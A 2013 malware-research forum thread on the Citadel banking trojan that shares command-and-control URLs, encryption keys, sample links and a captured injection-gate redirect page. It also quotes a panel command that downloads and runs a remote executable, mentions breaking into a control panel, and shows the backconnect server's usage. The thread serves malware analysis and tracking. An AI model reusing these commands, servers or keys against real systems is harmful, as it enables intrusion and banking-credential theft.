Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

Postby Xylitol » Tue Dec 17, 2013 2:30 pm

Citadel almost no trigger, just facebook
Code: Select all
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60

mitb panel anyway but seem dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby Xylitol » Tue Dec 17, 2013 2:52 pm

Targeting Spain, Canada, America, Paypal, United Kingdom
Code: Select all
Drop: hxtp://secctor.ru/image/gate.php
Update: hxtp://secctor.ru/image/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: E6 C0 56 0D 4D 74 8C 9A 49 21 DD DD 1B 92 CF 4B

https://zeustracker.abuse.ch/monitor.ph ... secctor.ru
https://www.virustotal.com/en/file/4a9e ... /analysis/
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 22, 2013 3:40 pm

Targeting Italy
Code: Select all
Drop: hxtp://109.235.50.169:53811/pr/2.php
Update: hxtp://109.235.50.169:53811/pr/1.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 70 B9 17 DE D7 62 9C 00 45 80 99 DA FE 67 0E 88

https://zeustracker.abuse.ch/monitor.ph ... 235.50.169
https://www.virustotal.com/en/file/41d0 ... /analysis/
WebInj:
Code: Select all
https://www.ddxalee.com/expupkin/pp/admin/

Image
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 22, 2013 5:55 pm

Targeting nothing.
Code: Select all
Drop: hxtp://91.229.78.150/cit/gate.php
Update: hxtp://91.229.78.150/cit/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: D7 A9 0A E3 C3 21 EF 59 73 D9 2D 9C 77 44 F3 CB

https://zeustracker.abuse.ch/monitor.ph ... 229.78.150
https://www.virustotal.com/en/file/7dbe ... /analysis/
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby teddybear » Tue Dec 24, 2013 6:40 pm

Xylitol wrote:Citadel almost no trigger, just facebook
Code: Select all
Drop: hxtp://dargs.su/citadm/vorota.php
Update: hxtp://dargs.su/citadm/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: C5 88 D5 B3 FC A8 1A 41 50 15 C6 5C A1 8A DA 60

mitb panel anyway but seem dead > http://jsunpack.jeek.org/?report=e3544e ... 9ab55e8000


Alive on same value33g[.]com IP 208,91,197,241 there's now:
Code: Select all
http://searchresultsguide.com/


No more on https but injected JS is working (tested a few minutes ago):
Code: Select all
http://searchresultsguide.com/nccvbv/gate.php?action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED


Returns the following page (sorry for removing almost everything, but you can always try for yourself):
Code: Select all
<!--
   top.location="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
   /*
-->
<script type="text/javascript">
   <!--
   dimensionUpdated = 0;
   function applyFrameKiller()
   {
      if(window.top != self)
      {
         cHeight = 0;
         if( typeof( window.innerHeight ) != 'undefined' ) {
         //Non-IE
         cHeight = window.innerHeight;
         dimensionUpdated = 1;
         } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )  ) {
         //IE 6+ in 'standards compliant mode'
         cHeight = document.documentElement.clientHeight;
         dimensionUpdated = 1;
         } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
         //IE 4 compatible
         cHeight = document.body.clientHeight;
         dimensionUpdated = 1;
         }
         if( cHeight <= 250 && dimensionUpdated == 1)
         {
            window.top.location = "http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&cifr=1&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED";
         }
      }
   }

   applyFrameKiller();
   // -->
</script><frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
   <frame src="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">
</frameset>
<noframes>
   <body bgcolor="#ffffff" text="#000000">
   <a href="http://searchresultsguide.com/?fp=REDACTED&prvtof=REDACTED&poru=REDACTED&action=check_uid&site=facebook&uid=REDACTED&return_method=loader&pkey=password&ssid=REDACTED">Click here to proceed</a>.
   </body>
</noframes><!--
*/
-->


Then I guess what follows is some shitty ads.
User avatar
teddybear
 
Posts: 16
Joined: Tue Sep 24, 2013 11:06 am
Reputation point: 2

Re: Citadel (Zeus clone)

Postby Xylitol » Sat Dec 28, 2013 10:25 am

Some Citadel, see comments on VT for more infos.

https://www.virustotal.com/en/file/81b4 ... /analysis/
https://www.virustotal.com/en/file/8b55 ... /analysis/
https://www.virustotal.com/en/file/04c6 ... /analysis/
https://www.virustotal.com/en/file/9756 ... /analysis/
https://www.virustotal.com/en/file/b1c3 ... /analysis/
https://www.virustotal.com/en/file/bb9d ... /analysis/
https://www.virustotal.com/en/file/c66d ... /analysis/
https://www.virustotal.com/en/file/6aab ... /analysis/
https://www.virustotal.com/en/file/8f14 ... /analysis/
https://www.virustotal.com/en/file/6046 ... /analysis/
https://www.virustotal.com/en/file/49e3 ... /analysis/
https://www.virustotal.com/en/file/70c1 ... /analysis/
https://www.virustotal.com/en/file/5f97 ... /analysis/
https://www.virustotal.com/en/file/ab79 ... /analysis/
https://www.virustotal.com/en/file/5089 ... /analysis/
https://www.virustotal.com/en/file/2400 ... /analysis/
https://www.virustotal.com/en/file/4a9e ... /analysis/
https://www.virustotal.com/en/file/4446 ... /analysis/
https://www.virustotal.com/en/file/42ec ... /analysis/
https://www.virustotal.com/en/file/e3ca ... /analysis/
https://www.virustotal.com/en/file/828f ... /analysis/
https://www.virustotal.com/en/file/2f25 ... 387204495/
https://www.virustotal.com/en/file/6233 ... /analysis/
https://www.virustotal.com/en/file/359b ... /analysis/
https://www.virustotal.com/en/file/255c ... /analysis/
https://www.virustotal.com/en/file/6ef4 ... /analysis/
https://www.virustotal.com/en/file/71ea ... /analysis/
https://www.virustotal.com/en/file/c2ca ... /analysis/
https://www.virustotal.com/en/file/20ca ... /analysis/
https://www.virustotal.com/en/file/be0f ... /analysis/
https://www.virustotal.com/en/file/753c ... /analysis/
https://www.virustotal.com/en/file/fe12 ... /analysis/
https://www.virustotal.com/en/file/eed7 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/4c8c ... /analysis/
https://www.virustotal.com/en/file/7810 ... /analysis/
https://www.virustotal.com/en/file/5da3 ... /analysis/
https://www.virustotal.com/en/file/fd71 ... /analysis/
https://www.virustotal.com/en/file/a687 ... /analysis/
https://www.virustotal.com/en/file/3e7f ... /analysis/
https://www.virustotal.com/en/file/b70f ... /analysis/
https://www.virustotal.com/en/file/8a59 ... /analysis/
https://www.virustotal.com/en/file/4c6d ... 387473145/
https://www.virustotal.com/en/file/7ca9 ... /analysis/
https://www.virustotal.com/en/file/5c03 ... /analysis/
https://www.virustotal.com/en/file/710b ... /analysis/
https://www.virustotal.com/en/file/4569 ... /analysis/
https://www.virustotal.com/en/file/e675 ... /analysis/
https://www.virustotal.com/en/file/7dbe ... /analysis/
https://www.virustotal.com/en/file/41d0 ... /analysis/
https://www.virustotal.com/en/file/a37b ... /analysis/
https://www.virustotal.com/en/file/7791 ... /analysis/
https://www.virustotal.com/en/file/d1d8 ... /analysis/
https://www.virustotal.com/en/file/ce6f ... /analysis/
https://www.virustotal.com/en/file/b620 ... /analysis/
https://www.virustotal.com/en/file/0ffc ... /analysis/
https://www.virustotal.com/en/file/1edc ... /analysis/
https://www.virustotal.com/en/file/a317 ... /analysis/
https://www.virustotal.com/en/file/60bc ... /analysis/
https://www.virustotal.com/en/file/e5d5 ... /analysis/
https://www.virustotal.com/en/file/a19c ... /analysis/
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

cbcs.exe

Postby g4m372 » Sun Dec 29, 2013 10:02 am

Hi, does anyone of you have cbcs.exe ? I am a little bit under time pressure, I need to prepare a demo for January and would like to include the VNC stuff.

http://laboratoriomalware.blogspot.de/2 ... ndows.html
g4m372
 
Posts: 3
Joined: Fri Aug 16, 2013 2:05 pm
Reputation point: 0

Re: Citadel (Zeus clone)

Postby Xylitol » Sun Dec 29, 2013 1:06 pm

One year old article and no hash provided, it would be hard to get it :D
This one maybe https://www.virustotal.com/en/file/b487 ... 388323320/
i got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby patriq » Sun Dec 29, 2013 10:20 pm

Worked on a Citadel C&C from ZeuS Tracker

Code: Select all
Panel:
http://173.242.112.135/office/obi/server/cp.php?m=login


Script was running:

user_execute hxtp://142.0.36.226/office/nh.exe

Code: Select all
nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437 (attached)
I think its a Citadel? some av vendors say zBot, etc.


https://malwr.com/analysis/MzVlOWJjYzNhNjQzNDhhYTk4YjE0NWFiMGMwYzZlYzQ/
https://www.virustotal.com/en/file/cf448a476158abe3ff0b7e0cb8eef6d076f6028d264730750861568f488159a0/analysis/1388343199/

I broke into the panel this weekend. Made a post about it since the server has been abandoned.

http://protectyournet.blogspot.com/2013/12/citadel-c-hosted-on-173242112135.html
You do not have the required permissions to view the files attached to this post.
Last edited by Xylitol on Sun Dec 29, 2013 10:32 pm, edited 1 time in total.
Reason: link obfuscation
patriq
 
Posts: 109
Joined: Fri Jun 28, 2013 8:11 pm
Reputation point: 22

Re: Citadel (Zeus clone)

Postby g4m372 » Mon Dec 30, 2013 12:54 pm

Xylitol wrote:One year old article and no hash provided, it would be hard to get it :D
This one maybe https://www.virustotal.com/en/file/b487 ... 388323320/
i got it from http://vxvault.siri-urz.net/ViriList.ph ... 8e4b786d1e


but first try looks good (at least in my sandbox) ... THX A LOT !

# cat output.txt
Citadel Backconnect Server 1.3.5.1.
Build time: 22:04:47 16.10.2012 GMT.

Usage: cbcs.exe <command> -<switch 1> -<switch N>

listen Start a backconnect server for one bot.
-nologo Suppresses display of sign-on banner.
-ipv4 Listen on IPv4 port.
-ipv6 Listen on IPv6 port.
-bp:[port] TCP port for accepting a connection from bot.
-cp:[port] TCP port for accepting a connection from ?lient.
g4m372
 
Posts: 3
Joined: Fri Aug 16, 2013 2:05 pm
Reputation point: 0

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 15 guests